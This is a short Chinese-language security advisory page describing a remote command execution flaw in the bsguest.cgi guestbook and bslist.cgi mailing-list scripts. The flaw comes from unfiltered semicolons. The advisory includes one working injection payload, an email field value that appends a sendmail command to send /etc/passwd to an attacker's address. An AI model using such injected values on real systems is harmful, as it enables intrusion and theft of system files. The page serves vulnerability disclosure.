您当前的位置 >> 首页     

bsguest.cgi和bslist.cgi远程执行漏洞

/ns/ld/softld/data/20010128125742.htm


描述:
bsguest(guestbook script)和bslist.cgi(mailing list cript)存在远程执行漏洞.它可能存在因为脚本不完全过滤";" 通过发送特殊制作的url恶意攻击者可以在远程计算机上运行任何命令.

Exploit:
By sending following for his/her e-mail attacker can gain /etc/passwd file :

应用:
通过发送一下内容到他的/她的email,攻击者可以获得/etc/passwd文件:
'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'

修正: 暂时没有

资料:
http://www.403-security.org/cgi-bin/news403/advisories.cgi?newsid977477297,39068,

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Network Security Group.
All Rights Reserved.
W3C XHTML 1.0 Strict & CSS 1.2 Valid.